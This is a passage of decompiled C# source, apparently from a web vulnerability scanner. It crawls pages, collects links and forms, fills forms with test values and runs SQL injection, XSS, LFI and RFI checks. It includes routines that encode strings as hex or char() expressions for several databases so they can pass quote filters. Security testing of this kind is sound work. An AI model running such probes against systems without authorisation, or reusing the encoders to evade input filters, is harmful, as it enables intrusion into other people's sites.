			if (Link.IndexOf("signout", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return false;
			}
			if (Link.IndexOf("exit", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return false;
			}
			if (Link.IndexOf("quit", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return false;
			}
			if (Link.IndexOf("delete", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return false;
			}
			if (Link.IndexOf("file:", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return false;
			}
			if (Link.IndexOf("{") >= 0)
			{
				return false;
			}
			if (Link.IndexOf("about:") >= 0)
			{
				return false;
			}
			if (Link.IndexOf("mailto:", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return false;
			}
			if (Link.IndexOf("javascript", StringComparison.OrdinalIgnoreCase) == 0)
			{
				return false;
			}
			if (Link.IndexOf("http") == 0 && Link.Length < 10)
			{
				return false;
			}
			return true;
		}

		public static string[] GetTextLinksBySource(string Source)
		{
			//IL_000d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0013: Expected O, but got Unknown
			//IL_002c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0032: Expected O, but got Unknown
			//IL_007b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0081: Expected O, but got Unknown
			//IL_009a: Unknown result type (might be due to invalid IL or missing references)
			//IL_00a1: Expected O, but got Unknown
			//IL_00eb: Unknown result type (might be due to invalid IL or missing references)
			//IL_00f1: Expected O, but got Unknown
			//IL_010a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0111: Expected O, but got Unknown
			List<string> list = new List<string>();
			Regex val = new Regex("(?<=<b>)[^\\s<]+(?=</b>)|(?<=<u>)[^\\s<]+(?=</u>)", (RegexOptions)17);
			MatchCollection val2 = val.Matches(Source);
			foreach (Match item in val2)
			{
				Match val3 = item;
				string value = ((Capture)val3).get_Value();
				if (!string.IsNullOrEmpty(value) && IsValidLink(value))
				{
					list.Add(value);
				}
			}
			val = new Regex("(?<=\\s)(https?://\\w+[\\w-\\?\\=\\./\\\\]+)(?=\\s)", (RegexOptions)17);
			val2 = val.Matches(Source);
			foreach (Match item2 in val2)
			{
				Match val4 = item2;
				string value2 = ((Capture)val4).get_Value();
				if (!string.IsNullOrEmpty(value2) && IsValidLink(value2))
				{
					list.Add(value2);
				}
			}
			val = new Regex("(?<=\\s)/\\w+[\\w-\\?\\=\\./\\\\]+(?=\\s)", (RegexOptions)17);
			val2 = val.Matches(Source);
			foreach (Match item3 in val2)
			{
				Match val5 = item3;
				string value3 = ((Capture)val5).get_Value();
				if (!string.IsNullOrEmpty(value3) && IsValidLink(value3))
				{
					list.Add(value3);
				}
			}
			return list.ToArray();
		}

		public static string[] GetLinksByTagname(string Source, string TagName, string PropertyName)
		{
			//IL_0018: Unknown result type (might be due to invalid IL or missing references)
			//IL_001e: Expected O, but got Unknown
			//IL_0037: Unknown result type (might be due to invalid IL or missing references)
			//IL_003d: Expected O, but got Unknown
			List<string> list = new List<string>();
			Regex val = new Regex("<" + TagName + "\\s+[^>]+>", (RegexOptions)17);
			MatchCollection val2 = val.Matches(Source);
			foreach (Match item in val2)
			{
				Match val3 = item;
				string elementFromInputLine = GetElementFromInputLine(((Capture)val3).get_Value(), PropertyName);
				if (!string.IsNullOrEmpty(elementFromInputLine) && IsValidLink(elementFromInputLine))
				{
					list.Add(elementFromInputLine);
				}
			}
			return list.ToArray();
		}

		public static string[] GetLinksFromScript(string Source, string JsKeyword)
		{
			//IL_0018: Unknown result type (might be due to invalid IL or missing references)
			//IL_001e: Expected O, but got Unknown
			//IL_003a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0040: Expected O, but got Unknown
			List<string> list = new List<string>();
			Regex val = new Regex("(?<=" + JsKeyword + "\\s*[=\\(]\\s*[\\x22\\x27])[^\\x22\\x27]+?(?=[\\x22\\x27\\x3b])", (RegexOptions)17);
			MatchCollection val2 = val.Matches(Source);
			foreach (Match item in val2)
			{
				Match val3 = item;
				string value = ((Capture)val3).get_Value();
				if (!string.IsNullOrEmpty(value) && value.IndexOf("logout", StringComparison.OrdinalIgnoreCase) < 0 && value.IndexOf("signout", StringComparison.OrdinalIgnoreCase) < 0 && value.IndexOf("delete", StringComparison.OrdinalIgnoreCase) < 0 && value.IndexOf("#") != 0 && value.IndexOf("@") < 0 && value.IndexOf("javascript", StringComparison.OrdinalIgnoreCase) != 0 && (value.IndexOf("http") != 0 || value.Length >= 10))
				{
					list.Add(value);
				}
			}
			return list.ToArray();
		}

		public string[] GetLinksFromSource(string Source, string RefPath, string PageExt)
		{
			string text = GetBaseHref(Source);
			if (string.IsNullOrEmpty(text))
			{
				text = RefPath;
			}
			List<string> list = new List<string>();
			if (!PageExt.Equals(".js"))
			{
				string[] textLinksBySource = GetTextLinksBySource(Source);
				string[] array = textLinksBySource;
				foreach (string item in array)
				{
					list.Add(item);
				}
				string[] linksByTagname = GetLinksByTagname(Source, "a", "href");
				string[] array2 = linksByTagname;
				foreach (string text2 in array2)
				{
					if (text2.IndexOf("mailto:") != 0)
					{
						list.Add(text2);
					}
				}
				string[] linksByTagname2 = GetLinksByTagname(Source, "form", "action");
				string[] array3 = linksByTagname2;
				foreach (string item2 in array3)
				{
					list.Add(item2);
				}
				string[] linksByTagname3 = GetLinksByTagname(Source, "iframe", "src");
				string[] array4 = linksByTagname3;
				foreach (string item3 in array4)
				{
					list.Add(item3);
				}
				string[] linksByTagname4 = GetLinksByTagname(Source, "frame", "src");
				string[] array5 = linksByTagname4;
				foreach (string item4 in array5)
				{
					list.Add(item4);
				}
				string[] linksByTagname5 = GetLinksByTagname(Source, "script", "src");
				string[] array6 = linksByTagname5;
				foreach (string item5 in array6)
				{
					list.Add(item5);
				}
				string[] linksByTagname6 = GetLinksByTagname(Source, "option", "value");
				string[] array7 = linksByTagname6;
				foreach (string item6 in array7)
				{
					list.Add(item6);
				}
				string[] linksByTagname7 = GetLinksByTagname(Source, "area", "href");
				string[] array8 = linksByTagname7;
				foreach (string item7 in array8)
				{
					list.Add(item7);
				}
			}
			string[] linksFromScript = GetLinksFromScript(Source, "\\.location");
			string[] array9 = linksFromScript;
			foreach (string item8 in array9)
			{
				list.Add(item8);
			}
			string[] linksFromScript2 = GetLinksFromScript(Source, "\\.href");
			string[] array10 = linksFromScript2;
			foreach (string item9 in array10)
			{
				list.Add(item9);
			}
			string[] linksFromScript3 = GetLinksFromScript(Source, "\\.open");
			string[] array11 = linksFromScript3;
			foreach (string item10 in array11)
			{
				list.Add(item10);
			}
			string[] linksFromScript4 = GetLinksFromScript(Source, "\\.action");
			string[] array12 = linksFromScript4;
			foreach (string item11 in array12)
			{
				list.Add(item11);
			}
			string[] linksFromScript5 = GetLinksFromScript(Source, "\\.src");
			string[] array13 = linksFromScript5;
			foreach (string item12 in array13)
			{
				list.Add(item12);
			}
			for (int num8 = 0; num8 < list.Count; num8++)
			{
				list[num8] = GetCompleteURL(list[num8], text);
			}
			return list.ToArray();
		}

		public WebForm ReGetCsrfForm(WebForm form)
		{
			try
			{
				string sourceCode = GetSourceCode(form.refUrl, RequestType.GET, "");
				WebForm[] formInfo = GetFormInfo(sourceCode, form.refUrl);
				string value = URL2NoParaURL(form.formInstance);
				WebForm[] array = formInfo;
				foreach (WebForm webForm in array)
				{
					string text = URL2NoParaURL(webForm.formInstance);
					if (text.Equals(value))
					{
						return webForm;
					}
				}
				return form;
			}
			catch (Exception)
			{
				return form;
			}
		}

		public WebForm[] GetFormInfo(string Source, string ReferPage)
		{
			//IL_000e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0014: Expected O, but got Unknown
			//IL_0193: Unknown result type (might be due to invalid IL or missing references)
			//IL_019a: Expected O, but got Unknown
			//IL_01b8: Unknown result type (might be due to invalid IL or missing references)
			//IL_01be: Expected O, but got Unknown
			//IL_01f2: Unknown result type (might be due to invalid IL or missing references)
			//IL_01f9: Expected O, but got Unknown
			//IL_045e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0464: Expected O, but got Unknown
			//IL_0480: Unknown result type (might be due to invalid IL or missing references)
			//IL_0487: Expected O, but got Unknown
			string pathFromURL = GetPathFromURL(ReferPage);
			Regex val = new Regex("<form\\s+[^>]+>", (RegexOptions)17);
			MatchCollection val2 = val.Matches(Source);
			List<WebForm> list = new List<WebForm>();
			string text = GetBaseHref(Source);
			if (string.IsNullOrEmpty(text))
			{
				text = pathFromURL;
			}
			string text2 = "";
			int[] array = new int[val2.get_Count()];
			string text3 = "";
			for (int i = 0; i < val2.get_Count(); i++)
			{
				text3 = ((Capture)val2.get_Item(i)).get_Value();
				if (i == 0)
				{
					array[i] = Source.IndexOf(text3);
				}
				else
				{
					array[i] = Source.IndexOf(text3, array[i - 1] + 10);
				}
			}
			for (int j = 0; j < val2.get_Count(); j++)
			{
				int num = 0;
				text3 = ((Capture)val2.get_Item(j)).get_Value();
				text2 = ((j != val2.get_Count() - 1) ? Source.Substring(array[j], array[j + 1] - array[j]) : Source.Substring(array[j]));
				string text4 = GetElementFromInputLine(text3, "action");
				if (string.IsNullOrEmpty(text4))
				{
					text4 = ReferPage;
				}
				string elementFromInputLine = GetElementFromInputLine(text3, "method");
				elementFromInputLine = ((!string.IsNullOrEmpty(elementFromInputLine)) ? elementFromInputLine.ToUpper() : "POST");
				string encType = "";
				if (elementFromInputLine.Equals("POST"))
				{
					encType = GetElementFromInputLine(text3, "enctype");
					encType = ((!string.IsNullOrEmpty(encType)) ? encType.ToLower() : "application/x-www-form-urlencoded");
				}
				text4 = GetCompleteURL(text4, text);
				if (elementFromInputLine.Equals("GET"))
				{
					text4 = URL2NoParaURL(text4);
				}
				Uri val3 = new Uri(text4);
				if (!val3.get_Host().Equals(DomainHost))
				{
					continue;
				}
				val = new Regex("<input\\s+[^>]+>", (RegexOptions)17);
				MatchCollection val4 = val.Matches(text2);
				string text5 = "";
				string text6 = "";
				string text7 = "";
				foreach (Match item2 in val4)
				{
					Match val5 = item2;
					text6 = ((Capture)val5).get_Value();
					Source.IndexOf(text6);
					text7 = GetElementFromInputLine(text6, "type");
					if (string.IsNullOrEmpty(text7))
					{
						text7 = "text";
					}
					text7 = text7.ToLower();
					if (text7.Equals("hidden"))
					{
						string elementFromInputLine2 = GetElementFromInputLine(text6, "name");
						if (!string.IsNullOrEmpty(elementFromInputLine2))
						{
							string elementFromInputLine3 = GetElementFromInputLine(text6, "value");
							if (!string.IsNullOrEmpty(text5))
							{
								text5 += "&";
							}
							text5 = text5 + elementFromInputLine2 + "=" + elementFromInputLine3;
						}
					}
					else if (text7.Equals("radio"))
					{
						string elementFromInputLine4 = GetElementFromInputLine(text6, "checked");
						if (!elementFromInputLine4.Equals("checked"))
						{
							continue;
						}
						string elementFromInputLine5 = GetElementFromInputLine(text6, "name");
						if (!string.IsNullOrEmpty(elementFromInputLine5))
						{
							string elementFromInputLine6 = GetElementFromInputLine(text6, "value");
							if (!string.IsNullOrEmpty(text5))
							{
								text5 += "&";
							}
							text5 = text5 + elementFromInputLine5 + "=" + elementFromInputLine6;
						}
					}
					else if (text7.Equals("text") || text7.Equals("password"))
					{
						string elementFromInputLine7 = GetElementFromInputLine(text6, "name");
						if (string.IsNullOrEmpty(elementFromInputLine7))
						{
							continue;
						}
						string elementFromInputLine8 = GetElementFromInputLine(text6, "value");
						if (!string.IsNullOrEmpty(elementFromInputLine8))
						{
							if (!string.IsNullOrEmpty(text5))
							{
								text5 += "&";
							}
							text5 = text5 + elementFromInputLine7 + "=" + elementFromInputLine8;
							continue;
						}
						elementFromInputLine8 = GenerateRandomIntegerString();
						num++;
						if (!string.IsNullOrEmpty(text5))
						{
							text5 += "&";
						}
						text5 = text5 + elementFromInputLine7 + "=" + elementFromInputLine8;
					}
					else
					{
						if (!text7.Equals("submit"))
						{
							continue;
						}
						string elementFromInputLine9 = GetElementFromInputLine(text6, "name");
						if (string.IsNullOrEmpty(elementFromInputLine9))
						{
							continue;
						}
						string elementFromInputLine10 = GetElementFromInputLine(text6, "value");
						if (!string.IsNullOrEmpty(elementFromInputLine10))
						{
							if (!string.IsNullOrEmpty(text5))
							{
								text5 += "&";
							}
							text5 = text5 + elementFromInputLine9 + "=" + elementFromInputLine10;
						}
					}
				}
				val = new Regex("<textarea\\s+[^>]+>", (RegexOptions)17);
				val4 = val.Matches(text2);
				foreach (Match item3 in val4)
				{
					Match val6 = item3;
					text6 = ((Capture)val6).get_Value();
					string elementFromInputLine11 = GetElementFromInputLine(text6, "name");
					if (!string.IsNullOrEmpty(elementFromInputLine11))
					{
						string str = "WCRTEXTAREATESTINPUT" + GenerateRandomIntegerString();
						num++;
						if (!string.IsNullOrEmpty(text5))
						{
							text5 += "&";
						}
						text5 = text5 + elementFromInputLine11 + "=" + str;
					}
				}
				string selectNameOptionValue = GetSelectNameOptionValue(text2);
				if (!string.IsNullOrEmpty(selectNameOptionValue))
				{
					if (!string.IsNullOrEmpty(text5))
					{
						text5 += "&";
					}
					text5 += selectNameOptionValue;
				}
				string text8 = "";
				text8 = ((!(elementFromInputLine == "GET")) ? (text4 + "^" + text5) : (text4 + "?" + text5));
				WebForm item = new WebForm(text8, ReferPage, encType);
				list.Add(item);
			}
			return list.ToArray();
		}

		public Vulnerability[] GetFormVulnCollection(string referURL, bool skipScanned)
		{
			List<Vulnerability> list = new List<Vulnerability>();
			if (referURL.IndexOf("signout", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return list.ToArray();
			}
			if (referURL.IndexOf("logout", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return list.ToArray();
			}
			if (CurrentStatus == TaskStatus.Stop)
			{
				return list.ToArray();
			}
			try
			{
				HttpWebResponse httpWebResponse = GetHttpWebResponse(referURL, RequestType.GET, "", "", "", EscapeCookie, "", "");
				if (httpWebResponse == null)
				{
					return list.ToArray();
				}
				string sourceCodeFromHttpWebResponse = GetSourceCodeFromHttpWebResponse(httpWebResponse);
				string referPage = ((object)((WebResponse)httpWebResponse).get_ResponseUri()).ToString();
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				WebForm[] formInfo = GetFormInfo(sourceCodeFromHttpWebResponse, referPage);
				WebForm[] array = formInfo;
				foreach (WebForm webForm in array)
				{
					string formInstance = webForm.formInstance;
					RequestType reqType;
					string[] array2;
					if (formInstance.IndexOf('^') < 0)
					{
						reqType = RequestType.GET;
						array2 = formInstance.Split(new char[1]
						{
							'?'
						});
					}
					else
					{
						reqType = RequestType.POST;
						array2 = formInstance.Split(new char[1]
						{
							'^'
						});
					}
					if (array2.Length < 2 || HasScannedURL(formInstance))
					{
						continue;
					}
					AddScannedURL(URL2DistinctURL(formInstance));
					if (WCRSetting.ScanSQLInjection)
					{
						DebugLog("Checking Form SQLInjection: " + formInstance);
						VulnSQLInjection[] sQLInjectionVulnCollection = GetSQLInjectionVulnCollection(formInstance, reqType, referURL, skipScanned, testEscapeSpace: false, webForm.enctype);
						if (sQLInjectionVulnCollection.Length == 0)
						{
							sQLInjectionVulnCollection = GetSQLInjectionVulnCollection(formInstance, reqType, referURL, skipScanned, testEscapeSpace: true, webForm.enctype);
						}
						VulnSQLInjection[] array3 = sQLInjectionVulnCollection;
						foreach (VulnSQLInjection item in array3)
						{
							list.Add(item);
						}
					}
					if (WCRSetting.ScanXSS)
					{
						DebugLog("Checking Form XSS: " + formInstance);
						VulnXSS[] xSSVulnCollection = GetXSSVulnCollection(formInstance, reqType, skipScanned, isDetectCsrf: true, webForm);
						VulnXSS[] array4 = xSSVulnCollection;
						foreach (VulnXSS item2 in array4)
						{
							list.Add(item2);
						}
					}
					if (WCRSetting.ScanLFI)
					{
						DebugLog("Checking Form LFI: " + formInstance);
						VulnLFI[] lFIVulnCollection = GetLFIVulnCollection(formInstance, reqType, skipScanned, isDetectCsrf: true, webForm);
						VulnLFI[] array5 = lFIVulnCollection;
						foreach (VulnLFI item3 in array5)
						{
							list.Add(item3);
						}
					}
					if (WCRSetting.ScanRFI)
					{
						DebugLog("Checking Form RFI: " + formInstance);
						Vulnerability[] rFIVulnCollection = GetRFIVulnCollection(formInstance, reqType, skipScanned, isDetectCsrf: true, webForm);
						Vulnerability[] array6 = rFIVulnCollection;
						foreach (Vulnerability item4 in array6)
						{
							list.Add(item4);
						}
					}
				}
				return list.ToArray();
			}
			catch
			{
				return list.ToArray();
			}
		}

		public int UnicodeInt2UTF8Int(int UnicodeInt)
		{
			if (UnicodeInt < 128)
			{
				return UnicodeInt;
			}
			int num = (UnicodeInt >> 12) & 0xF;
			int num2 = (UnicodeInt >> 6) & 0x3F;
			int num3 = UnicodeInt & 0x3F;
			return (num + 224 << 16) + (num2 + 128 << 8) + (num3 + 128);
		}

		public string EscapeSingleQuotes(string ItemName, DBType dbType, bool isSQLServerDetect)
		{
			if (isSQLServerDetect)
			{
				byte b = 0;
				byte b2 = 0;
				char[] array = ItemName.ToCharArray();
				string text = "";
				for (int i = 0; i < array.Length; i++)
				{
					if (!string.IsNullOrEmpty(text))
					{
						text += "%2B";
					}
					b2 = (byte)(array[i] & 0xFFu);
					b = (byte)((int)array[i] >> 8);
					text = text + "char(" + $"{b * 256 + b2:D}" + ")";
				}
				return text;
			}
			return EscapeSingleQuotes(ItemName, dbType);
		}

		public string EscapeSingleQuotes(string ItemName, DBType dbType)
		{
			try
			{
				if (string.IsNullOrEmpty(ItemName))
				{
					return "";
				}
				char[] array = ItemName.ToCharArray();
				byte[] bytes = DBEncoding.GetBytes(ItemName);
				string text = "";
				switch (dbType)
				{
				case DBType.MySQL:
				{
					text += "0x";
					for (int m = 0; m < bytes.Length; m++)
					{
						text += $"{(int)bytes[m]:X2}";
					}
					return text;
				}
				case DBType.SQLServer:
				{
					text += "0x";
					byte b = 0;
					byte b2 = 0;
					for (int k = 0; k < array.Length; k++)
					{
						b2 = (byte)(array[k] & 0xFFu);
						b = (byte)((int)array[k] >> 8);
						text += $"{b2:X2}{b:X2}";
					}
					return text;
				}
				case DBType.Oracle:
				{
					for (int n = 0; n < array.Length; n++)
					{
						if (!string.IsNullOrEmpty(text))
						{
							text += "||";
						}
						text = text + "chr(" + $"{UnicodeInt2UTF8Int(array[n]):D}" + ")";
					}
					return text;
				}
				case DBType.DB2:
				case DBType.PostgreSQL:
				{
					for (int j = 0; j < bytes.Length; j++)
					{
						if (!string.IsNullOrEmpty(text))
						{
							text += "||";
						}
						text = text + "chr(" + $"{(int)bytes[j]:D}" + ")";
					}
					return text;
				}
				case DBType.Access:
				{
					for (int l = 0; l < array.Length; l++)
					{
						if (!string.IsNullOrEmpty(text))
						{
							text += "%2B";
						}
						text = text + "chr(" + $"{UnicodeInt2UTF8Int(array[l]):D}" + ")";
					}
					return text;
				}
				case DBType.SQLite:
				{
					for (int i = 0; i < bytes.Length; i++)
					{
						if (!string.IsNullOrEmpty(text))
						{
							text += ",";
						}
						text += $"{(int)bytes[i]:D}";
					}
					return "char(" + text + ")";
				}
				default:
					return ItemName;
				}
			}
			catch (Exception)
			{
				return ItemName;
			}
		}
	}
}
